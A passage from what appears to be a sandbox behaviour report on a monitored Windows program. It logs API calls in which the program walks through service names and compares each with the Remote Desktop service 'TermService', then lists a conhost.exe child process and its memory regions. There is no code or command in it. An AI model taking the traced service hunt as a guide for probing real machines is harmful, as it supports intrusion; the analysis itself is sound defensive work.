dwFreeType=0x8000) returned 1 [0320.658] lstrlenW (lpString="RasMan") returned 6 [0320.658] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.658] lstrlenW (lpString="RasMan") returned 6 [0320.658] lstrcpyW (in: lpString1=0x3790000, lpString2="RasMan" | out: lpString1="RasMan") returned="RasMan" [0320.658] lstrcmpW (lpString1="RasMan", lpString2="TermService") returned -1 [0320.658] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.659] lstrlenW (lpString="RemoteAccess") returned 12 [0320.659] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.660] lstrlenW (lpString="RemoteAccess") returned 12 [0320.660] lstrcpyW (in: lpString1=0x3790000, lpString2="RemoteAccess" | out: lpString1="RemoteAccess") returned="RemoteAccess" [0320.660] lstrcmpW (lpString1="RemoteAccess", lpString2="TermService") returned -1 [0320.660] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.661] lstrlenW (lpString="RemoteRegistry") returned 14 [0320.661] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.662] lstrlenW (lpString="RemoteRegistry") returned 14 [0320.662] lstrcpyW (in: lpString1=0x3790000, lpString2="RemoteRegistry" | out: lpString1="RemoteRegistry") returned="RemoteRegistry" [0320.665] lstrcmpW (lpString1="RemoteRegistry", lpString2="TermService") returned -1 [0320.665] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.667] lstrlenW (lpString="RetailDemo") returned 10 [0320.667] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.667] lstrlenW (lpString="RetailDemo") returned 10 [0320.667] lstrcpyW (in: lpString1=0x3790000, lpString2="RetailDemo" | out: lpString1="RetailDemo") returned="RetailDemo" [0320.667] lstrcmpW (lpString1="RetailDemo", lpString2="TermService") returned -1 [0320.667] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.668] lstrlenW (lpString="RpcEptMapper") returned 12 [0320.668] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.669] lstrlenW (lpString="RpcEptMapper") returned 12 [0320.669] lstrcpyW (in: lpString1=0x3790000, lpString2="RpcEptMapper" | out: lpString1="RpcEptMapper") returned="RpcEptMapper" [0320.669] lstrcmpW (lpString1="RpcEptMapper", lpString2="TermService") returned -1 [0320.669] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.670] lstrlenW (lpString="RpcLocator") returned 10 [0320.670] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.671] lstrlenW (lpString="RpcLocator") returned 10 [0320.671] lstrcpyW (in: lpString1=0x3790000, lpString2="RpcLocator" | out: lpString1="RpcLocator") returned="RpcLocator" [0320.671] lstrcmpW (lpString1="RpcLocator", lpString2="TermService") returned -1 [0320.671] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.672] lstrlenW (lpString="RpcSs") returned 5 [0320.672] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.673] lstrlenW (lpString="RpcSs") returned 5 [0320.673] lstrcpyW (in: lpString1=0x3790000, lpString2="RpcSs" | out: lpString1="RpcSs") returned="RpcSs" [0320.673] lstrcmpW (lpString1="RpcSs", lpString2="TermService") returned -1 [0320.673] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.674] lstrlenW (lpString="SamSs") returned 5 [0320.674] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.674] lstrlenW (lpString="SamSs") returned 5 [0320.674] lstrcpyW (in: lpString1=0x3790000, lpString2="SamSs" | out: lpString1="SamSs") returned="SamSs" [0320.674] lstrcmpW (lpString1="SamSs", lpString2="TermService") returned -1 [0320.675] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.675] lstrlenW (lpString="SCardSvr") returned 8 [0320.676] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.676] lstrlenW (lpString="SCardSvr") returned 8 [0320.676] lstrcpyW (in: lpString1=0x3790000, lpString2="SCardSvr" | out: lpString1="SCardSvr") returned="SCardSvr" [0320.676] lstrcmpW (lpString1="SCardSvr", lpString2="TermService") returned -1 [0320.676] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.677] lstrlenW (lpString="ScDeviceEnum") returned 12 [0320.677] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.546] lstrlenW (lpString="ScDeviceEnum") returned 12 [0321.546] lstrcpyW (in: lpString1=0x3790000, lpString2="ScDeviceEnum" | out: lpString1="ScDeviceEnum") returned="ScDeviceEnum" [0321.546] lstrcmpW (lpString1="ScDeviceEnum", lpString2="TermService") returned -1 [0321.546] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.547] lstrlenW (lpString="Schedule") returned 8 [0321.547] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.548] lstrlenW (lpString="Schedule") returned 8 [0321.548] lstrcpyW (in: lpString1=0x3790000, lpString2="Schedule" | out: lpString1="Schedule") returned="Schedule" [0321.548] lstrcmpW (lpString1="Schedule", lpString2="TermService") returned -1 [0321.548] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.549] lstrlenW (lpString="SCPolicySvc") returned 11 [0321.549] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.549] lstrlenW (lpString="SCPolicySvc") returned 11 [0321.549] lstrcpyW (in: lpString1=0x3790000, lpString2="SCPolicySvc" | out: lpString1="SCPolicySvc") returned="SCPolicySvc" [0321.549] lstrcmpW (lpString1="SCPolicySvc", lpString2="TermService") returned -1 [0321.549] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.550] lstrlenW (lpString="SDRSVC") returned 6 [0321.550] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.550] lstrlenW (lpString="SDRSVC") returned 6 [0321.550] lstrcpyW (in: lpString1=0x3790000, lpString2="SDRSVC" | out: lpString1="SDRSVC") returned="SDRSVC" [0321.550] lstrcmpW (lpString1="SDRSVC", lpString2="TermService") returned -1 [0321.551] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.551] lstrlenW (lpString="seclogon") returned 8 [0321.551] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.552] lstrlenW (lpString="seclogon") returned 8 [0321.552] lstrcpyW (in: lpString1=0x3790000, lpString2="seclogon" | out: lpString1="seclogon") returned="seclogon" [0321.552] lstrcmpW (lpString1="seclogon", lpString2="TermService") returned -1 [0321.552] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.552] lstrlenW (lpString="SENS") returned 4 [0321.552] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.555] lstrlenW (lpString="SENS") returned 4 [0321.555] lstrcpyW (in: lpString1=0x3790000, lpString2="SENS" | out: lpString1="SENS") returned="SENS" [0321.555] lstrcmpW (lpString1="SENS", lpString2="TermService") returned -1 [0321.555] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.556] lstrlenW (lpString="SensorDataService") returned 17 [0321.556] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.557] lstrlenW (lpString="SensorDataService") returned 17 [0321.557] lstrcpyW (in: lpString1=0x3790000, lpString2="SensorDataService" | out: lpString1="SensorDataService") returned="SensorDataService" [0321.557] lstrcmpW (lpString1="SensorDataService", lpString2="TermService") returned -1 [0321.557] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.557] lstrlenW (lpString="SensorService") returned 13 [0321.557] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.558] lstrlenW (lpString="SensorService") returned 13 [0321.558] lstrcpyW (in: lpString1=0x3790000, lpString2="SensorService" | out: lpString1="SensorService") returned="SensorService" [0321.558] lstrcmpW (lpString1="SensorService", lpString2="TermService") returned -1 [0321.558] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.558] lstrlenW (lpString="SensrSvc") returned 8 [0321.558] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.559] lstrlenW (lpString="SensrSvc") returned 8 [0321.559] lstrcpyW (in: lpString1=0x3790000, lpString2="SensrSvc" | out: lpString1="SensrSvc") returned="SensrSvc" [0321.559] lstrcmpW (lpString1="SensrSvc", lpString2="TermService") returned -1 [0321.559] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.559] lstrlenW (lpString="SessionEnv") returned 10 [0321.559] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.560] lstrlenW (lpString="SessionEnv") returned 10 [0321.560] lstrcpyW (in: lpString1=0x3790000, lpString2="SessionEnv" | out: lpString1="SessionEnv") returned="SessionEnv" [0321.560] lstrcmpW (lpString1="SessionEnv", lpString2="TermService") returned -1 [0321.560] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.561] lstrlenW (lpString="SharedAccess") returned 12 [0321.561] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.561] lstrlenW (lpString="SharedAccess") returned 12 [0321.561] lstrcpyW (in: lpString1=0x3790000, lpString2="SharedAccess" | out: lpString1="SharedAccess") returned="SharedAccess" [0321.561] lstrcmpW (lpString1="SharedAccess", lpString2="TermService") returned -1 [0321.561] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.562] lstrlenW (lpString="ShellHWDetection") returned 16 [0321.562] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.562] lstrlenW (lpString="ShellHWDetection") returned 16 [0321.562] lstrcpyW (in: lpString1=0x3790000, lpString2="ShellHWDetection" | out: lpString1="ShellHWDetection") returned="ShellHWDetection" [0321.562] lstrcmpW (lpString1="ShellHWDetection", lpString2="TermService") returned -1 [0321.562] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.563] lstrlenW (lpString="smphost") returned 7 [0321.563] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.564] lstrlenW (lpString="smphost") returned 7 [0321.564] lstrcpyW (in: lpString1=0x3790000, lpString2="smphost" | out: lpString1="smphost") returned="smphost" [0321.564] lstrcmpW (lpString1="smphost", lpString2="TermService") returned -1 [0321.564] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.565] lstrlenW (lpString="SmsRouter") returned 9 [0321.565] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.565] lstrlenW (lpString="SmsRouter") returned 9 [0321.565] lstrcpyW (in: lpString1=0x3790000, lpString2="SmsRouter" | out: lpString1="SmsRouter") returned="SmsRouter" [0321.566] lstrcmpW (lpString1="SmsRouter", lpString2="TermService") returned -1 [0321.566] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.566] lstrlenW (lpString="SNMPTRAP") returned 8 [0321.566] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.567] lstrlenW (lpString="SNMPTRAP") returned 8 [0321.567] lstrcpyW (in: lpString1=0x3790000, lpString2="SNMPTRAP" | out: lpString1="SNMPTRAP") returned="SNMPTRAP" [0321.567] lstrcmpW (lpString1="SNMPTRAP", lpString2="TermService") returned -1 [0321.567] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.567] lstrlenW (lpString="Spooler") returned 7 [0321.567] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.568] lstrlenW (lpString="Spooler") returned 7 [0321.568] lstrcpyW (in: lpString1=0x3790000, lpString2="Spooler" | out: lpString1="Spooler") returned="Spooler" [0321.568] lstrcmpW (lpString1="Spooler", lpString2="TermService") returned -1 [0321.568] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.569] lstrlenW (lpString="sppsvc") returned 6 [0321.569] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.569] lstrlenW (lpString="sppsvc") returned 6 [0321.569] lstrcpyW (in: lpString1=0x3790000, lpString2="sppsvc" | out: lpString1="sppsvc") returned="sppsvc" [0321.569] lstrcmpW (lpString1="sppsvc", lpString2="TermService") returned -1 [0321.569] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.572] lstrlenW (lpString="SSDPSRV") returned 7 [0321.572] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.572] lstrlenW (lpString="SSDPSRV") returned 7 [0321.572] lstrcpyW (in: lpString1=0x3790000, lpString2="SSDPSRV" | out: lpString1="SSDPSRV") returned="SSDPSRV" [0321.572] lstrcmpW (lpString1="SSDPSRV", lpString2="TermService") returned -1 [0321.572] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.573] lstrlenW (lpString="SstpSvc") returned 7 [0321.573] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.573] lstrlenW (lpString="SstpSvc") returned 7 [0321.573] lstrcpyW (in: lpString1=0x3790000, lpString2="SstpSvc" | out: lpString1="SstpSvc") returned="SstpSvc" [0321.573] lstrcmpW (lpString1="SstpSvc", lpString2="TermService") returned -1 [0321.573] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.574] lstrlenW (lpString="StateRepository") returned 15 [0321.574] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.574] lstrlenW (lpString="StateRepository") returned 15 [0321.574] lstrcpyW (in: lpString1=0x3790000, lpString2="StateRepository" | out: lpString1="StateRepository") returned="StateRepository" [0321.574] lstrcmpW (lpString1="StateRepository", lpString2="TermService") returned -1 [0321.574] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.575] lstrlenW (lpString="stisvc") returned 6 [0321.575] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.575] lstrlenW (lpString="stisvc") returned 6 [0321.575] lstrcpyW (in: lpString1=0x3790000, lpString2="stisvc" | out: lpString1="stisvc") returned="stisvc" [0321.575] lstrcmpW (lpString1="stisvc", lpString2="TermService") returned -1 [0321.575] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.576] lstrlenW (lpString="StorSvc") returned 7 [0321.576] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.576] lstrlenW (lpString="StorSvc") returned 7 [0321.576] lstrcpyW (in: lpString1=0x3790000, lpString2="StorSvc" | out: lpString1="StorSvc") returned="StorSvc" [0321.577] lstrcmpW (lpString1="StorSvc", lpString2="TermService") returned -1 [0321.577] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.577] lstrlenW (lpString="svsvc") returned 5 [0321.577] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.578] lstrlenW (lpString="svsvc") returned 5 [0321.578] lstrcpyW (in: lpString1=0x3790000, lpString2="svsvc" | out: lpString1="svsvc") returned="svsvc" [0321.578] lstrcmpW (lpString1="svsvc", lpString2="TermService") returned -1 [0321.578] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.578] lstrlenW (lpString="swprv") returned 5 [0321.578] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.579] lstrlenW (lpString="swprv") returned 5 [0321.579] lstrcpyW (in: lpString1=0x3790000, lpString2="swprv" | out: lpString1="swprv") returned="swprv" [0321.579] lstrcmpW (lpString1="swprv", lpString2="TermService") returned -1 [0321.579] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.580] lstrlenW (lpString="SysMain") returned 7 [0321.580] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.580] lstrlenW (lpString="SysMain") returned 7 [0321.580] lstrcpyW (in: lpString1=0x3790000, lpString2="SysMain" | out: lpString1="SysMain") returned="SysMain" [0321.580] lstrcmpW (lpString1="SysMain", lpString2="TermService") returned -1 [0321.580] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.581] lstrlenW (lpString="SystemEventsBroker") returned 18 [0321.581] VirtualAlloc (lpAddress=0x0, dwSize=0x26, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.581] lstrlenW (lpString="SystemEventsBroker") returned 18 [0321.581] lstrcpyW (in: lpString1=0x3790000, lpString2="SystemEventsBroker" | out: lpString1="SystemEventsBroker") returned="SystemEventsBroker" [0321.581] lstrcmpW (lpString1="SystemEventsBroker", lpString2="TermService") returned -1 [0321.581] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.582] lstrlenW (lpString="TabletInputService") returned 18 [0321.582] VirtualAlloc (lpAddress=0x0, dwSize=0x26, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.582] lstrlenW (lpString="TabletInputService") returned 18 [0321.582] lstrcpyW (in: lpString1=0x3790000, lpString2="TabletInputService" | out: lpString1="TabletInputService") returned="TabletInputService" [0321.582] lstrcmpW (lpString1="TabletInputService", lpString2="TermService") returned -1 [0321.582] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.583] lstrlenW (lpString="TapiSrv") returned 7 [0321.583] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0321.583] lstrlenW (lpString="TapiSrv") returned 7 [0321.583] lstrcpyW (in: lpString1=0x3790000, lpString2="TapiSrv" | out: lpString1="TapiSrv") returned="TapiSrv" [0321.583] lstrcmpW (lpString1="TapiSrv", lpString2="TermService") returned -1 [0321.583] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) Process: id = "17" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2edb9000" os_pid = "0xfc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0xfb0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1953 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1954 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1955 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1956 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1957 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1958 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1959 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1960 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1961 start_va = 0x7ff6965e0000 end_va = 0x7ff6965f0fff monitored = 0 entry_point = 0x7ff6965e16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1962 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1963 start_va = 0x730000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 1964 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1965 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1966 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1967 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1968 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1969 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1970 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1971 start_va = 0x830000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 1972 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1993 start_va = 0x7ff84f7a0000 end_va = 0x7ff84f7f8fff monitored = 0 entry_point = 0x7ff84f7afbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1994 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1995 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1996 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1997 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1998 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1999 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2000 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2001 start_va = 0x7ff85c410000 end_va = 0x7ff85c552fff monitored = 0 entry_point = 0x7ff85c438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2002 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2003 start_va = 0x7ff85d090000 end_va = 0x7ff85d0cafff monitored = 0 entry_point = 0x7ff85d0912f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2004 start_va = 0x7ff85c130000 end_va = 0x7ff85c1f0fff monitored = 0 entry_point = 0x7ff85c150da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2005 start_va = 0x7ff857c10000 end_va = 0x7ff857d95fff monitored = 0 entry_point = 0x7ff857c5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2019 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2020 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2021 start_va = 0x830000 end_va = 0x9b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 2022 start_va = 0xa00000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 2023 start_va = 0xa10000 end_va = 0xb90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 2024 start_va = 0xba0000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 2025 start_va = 0x1fa0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 2026 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2027 start_va = 0x7ff85a5a0000 end_va = 0x7ff85bafefff monitored = 0 entry_point = 0x7ff85a7011f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2028 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 